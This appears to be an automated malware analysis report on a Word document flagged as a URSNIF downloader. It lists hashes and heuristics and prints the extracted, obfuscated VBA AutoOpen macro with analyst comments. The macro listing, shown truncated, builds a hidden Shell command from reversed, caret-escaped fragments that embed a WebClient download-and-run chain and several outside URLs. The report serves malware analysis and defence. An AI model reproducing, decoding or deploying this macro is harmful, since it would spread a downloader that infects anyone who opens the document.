Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a32aa4a61cd6dbe7…

MALICIOUS

Office (OLE)

71.1 KB Created: 2018-09-04 23:11:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: bbd1209cf85297e7a3e93885aaa63a14 SHA-1: ebbb5c845866dffd136ec30a284858c7d7defad3 SHA-256: a32aa4a61cd6dbe715fc55bbbe13f99835855ea453d5cf50ff00cd2dd6b886aa
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine, which runs automatically when the document is opened. The macro calls the Shell() function, indicating an attempt to execute an arbitrary command line. The ClamAV signature classifies it as a downloader, suggesting it is designed to fetch and execute additional malicious content. The macro filename 'macros.bas' and the ClamAV detection name are included as IOCs; note that 'macros.bas' is the filename assigned by the extraction tool (see Extracted artifacts), so it is useful for correlating artifacts within this report rather than as a standalone indicator.

Heuristics 6

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that on this sample a VBA project was in fact recovered (see the OLE_VBA_MACROS finding and the extracted macros.bas below), so the "no modern VBA project" wording here is the rule's generic description rather than a statement about this file; read it together with those findings.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4765 bytes
SHA-256: d0e72aee9592f7fb0bfe84caa7efc61997454ac6e73a4342ba49dcc18d1ad89e
Preview script
First 1,000 lines of the extracted script
' Module attribute header as emitted by the extractor. VB_Base = "1Normal.ThisDocument"
' suggests this is the document's own ThisDocument module (so the AutoOpen below is
' attached to the document itself rather than to a separate code module) — verify against
' the OLE stream layout if that distinction matters for the analysis.
Attribute VB_Name = "YzwwqHZAsAqRqM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' AutoOpen: auto-executed entry point when the document is opened (OLE_VBA_AUTOOPEN
' finding). The only statement with an effect is the single VBA.Shell call; the
' surrounding Hour statements look like junk padding.
Sub AutoOpen()
' "On Error Resume Next" split across line continuations. Every runtime error in
' this routine — including any failure of the Shell call itself — is silently ignored.
On _
Error _
Resume _
Next
   ' Hour is called as a statement with a non-date string argument: the return value
   ' is discarded and any type-conversion error is swallowed by the handler above, so
   ' these lines do nothing observable.
   Hour "uXNt" + "O" + "zDFQOzl" + "495743396"
   Hour "5784" + "pPzLiBLiPq" + "5046" + "Bwa"
' The command line is assembled from the return values of helper functions defined in
' the other modules (ZJGHoXrq and KBGYqFndVa are shown further down in this listing;
' the rest are outside the preview). q is never assigned in this routine, so
' CleanString(q) presumably contributes nothing — TODO confirm. The second argument,
' 94 - 94 = 0, is the window-style parameter (vbHide), i.e. no visible window.
VBA.Shell CleanString(q) + lokTfdTfMj + PzJBcjmdbpzI + ZJGHoXrq + KBGYqFndVa + kdnAUcPfzD + zidblLqCzHKD + ljNTcTBPp, 94 - 94
   ' More junk Hour statements, no effect.
   Hour "pDczvoc" + "vjoBkuPuNzCq"
   Hour "9168" + "360342317"
End Sub



' Start of a second module (randomised name) holding the string-building helpers
' referenced by AutoOpen's VBA.Shell call.
Attribute VB_Name = "rrcjfJjhot"
' ZJGHoXrq: builds one segment of the command line that AutoOpen passes to VBA.Shell.
' Returns the nine local string fragments (KHroFR .. qWFnFNz) concatenated in
' declaration order. The fragments are interleaved with junk Hour statements and are
' heavy with caret characters — presumably cmd.exe escape characters used to break
' signature matching; the decoded command is deliberately not reconstructed in these
' notes. Only the ClamAV classification (downloader) is asserted by the report.
Function ZJGHoXrq()

' Same "On Error Resume Next" pattern as AutoOpen: every error below is ignored.
On _
Error _
Resume _
Next
' Hour statements with non-date string arguments: return value discarded, errors
' swallowed — padding with no effect (applies to every Hour line in this function).
Hour "cK" + "HQmQ"
   Hour "461345707" + "isCJ"
   Hour "172709412" + "2359"
   Hour "ovPRkrWNMhhdSV" + "T"
' First fragment. Chr(5 + 2 + 1 + 1 + 25) evaluates to Chr(34), a double-quote
' character, assembled arithmetically so the literal never appears in the source.
KHroFR = "cm" + "d /V^" + ":" + "^ON/" + "C" + Chr(5 + 2 + 1 + 1 + 25) + "^s" + "^et ^X^" + "Bk=" + "^  " + "^  " + "^   ^ " + "^   " + " ^  ^"
Hour "iUti" + "UiXZcwbLT"
   Hour "7751" + "QMfB" + "2318" + "iLiABwRZb"
   Hour "IFQHFSshtlkboA" + "7261"
   Hour "ZIDvY" + "174855443"
mRiKfonYI = "   }^" + "}^{^hct" + "ac};k" + "^a^er" + "b^;" + "KVr^$^" + " m^e" + "^" + "t^I-" + "ekovnI;"
Hour "1255" + "zwcX" + "CuET" + "ssaGwiIjfX"
   Hour "9511" + "IYbihTnbti"
   Hour "QVaFmLc" + "533958705" + "mzzI" + "dd"
fUapSz = ")" + "KVr^$" + " ^,GDj" + "^$(e^l" + "iFdaol" + "n^wo^D^" + ".r" + "^i^" + "T^${yr^"
Hour "w" + "9741" + "31391365" + "TfB"
   Hour "XDw" + "Y"
   Hour "EpRNv" + "3687"
Ydznp = "t" + "^{)p" + "N^H^" + "$ n^i " + "G^" + "D^j^"
Hour "1192" + "DiD"
   Hour "cMs" + "396258114" + "a" + "t"
   Hour "9254" + "LMiJ"
   Hour "BKhE" + "185935812" + "ss" + "101710257"
iWLdvnrX = "$(hc" + "aer^o" + "f^;'^" + "e^xe^.'" + "^+H^" + "hz" + "$+^'\'^" + "+ci^lb" + "^" + "up:vn^e" + "$"
Hour "z" + "qrzknG" + "ruQsGbBt" + "UMIAbKmickivE"
   Hour "9287" + "KTnoblQV" + "4354" + "106"
   Hour "124548320" + "333359069"
   Hour "Kq" + "Mk" + "v" + "haJPPw"
DRSQzzimQ = "=^KVr" + "$" + "^;^'^8" + "^" + "0^1' = " + "Hhz" + "^$;)'^@" + "'(" + "t^i^" + "l^p" + "^S.'^L" + "x^f/^m" + "^o"
Hour "kiALZDL" + "sHfm" + "zHVUdTtw" + "385526031"
' The remaining fragments contain recurring "//^:" / "ptth" / "@" sequences, which
' look like obscured URL material (consistent with the downloader classification);
' the hosts are not extracted here — defer to a sandbox or a proper decoder.
XzZNnlX = "c.^s" + "^" + "e" + "ige^t^a" + "r^ts" + "dn" + "i" + "mn" + "^ir" + "a^" + "e^b//^:" + "^" + "p^t^th@"
Hour "403741703" + "492857809" + "rXtj" + "JwfiCHrBlbajL"
   Hour "T" + "1392" + "CXv" + "3517"
   Hour "nizvrR" + "n" + "43" + "FCW"
   Hour "I" + "57974092"
BiBfjkh = "U" + "H" + "b^3^I" + "jB" + "/puorg." + "not^s" + "r^i^f//" + ":ptth" + "@^" + "t" + "N^wB^" + "JNuu/m"
Hour "370099275" + "viqzwdi"
   Hour "Qw" + "DtUmhN"
   Hour "450814384" + "65239248" + "287449246" + "2607"
   Hour "463964986" + "k" + "235848379" + "liKwTWiz"
   Hour "rcII" + "c"
qWFnFNz = "^" + "o" + "c.cet" + "^a^b" + "^me^o^" + "pu" + "r^g//" + "^:^pt^t" + "h^@" + "a^x"
' Function return value: all nine fragments joined in order. Consumed by the
' VBA.Shell call in AutoOpen.
ZJGHoXrq = KHroFR + mRiKfonYI + fUapSz + Ydznp + iWLdvnrX + DRSQzzimQ + XzZNnlX + BiBfjkh + qWFnFNz
   Hour "kq" + "C" + "Ch" + "tK"
   Hour "417293346" + "Sw"
   Hour "FCnOufME" + "mGXF"
End Function
Function KBGYqFndVa()

On _
Error _
Resume _
Next
Hour "NU" + "iOpBaDAsNGHs" + "403167801" + "OQRYhS"
   Hour "RXRAaphq" + "kjTE" + "515265240" + "cvFNn"
   Hour "N" + "H"
   Hour "zwkh" + "tNiLoCiSo" + "3752" + "50989739"
jnQoPUS = "8S1" + "/r" + "^" + "t^." + "m^oc.tn" + "^o^k^o" + "^teb//^" + ":^p" + "t^t^h@^" + "T/moc^." + "haru^mr"
Hour "BzYE" + "15224881"
   Hour "QCW" + "ov" + "tJCf" + "7595"
   Hour "384" + "LKwd" + "mjzZstzGzKzK" + "7842"
jSaBtlHao = "^" + "od" + "n^ev//^" + ":^pt" + "t^" + "h'=" + "^" + "pN^H$;^" + "tn^e" + "ilC" + "b" + "^e^W" + "."
Hour "JPj" + "7692" + "9301" + "108746628"
   Hour "9945" + "479719177"
JcnvrCPHiju = "^t^" + "e" + "N^ t" + "ce^j^" + "bo^-^" + "w" + "en" + "^=" + "riT^" + "$ ^l^l" + "^e^h^"
Hour "424814229" + "kMrlwCE" + "uirNPjrjr" + "zLJjOiRG"
   Hour "HSHb" + "3716" + "ofuVnFz" + "119133833"
XRzdVQw = "sr^e" + "^" + "wo^p&" + "&^f^o" + "r" + " /^L " + "%^2 ^i" + "n " + "(3^6^"
Hour "l" + "QCjP"
   Hour "PaFCpdwYvSw" + "KYdjJY"
... (truncated)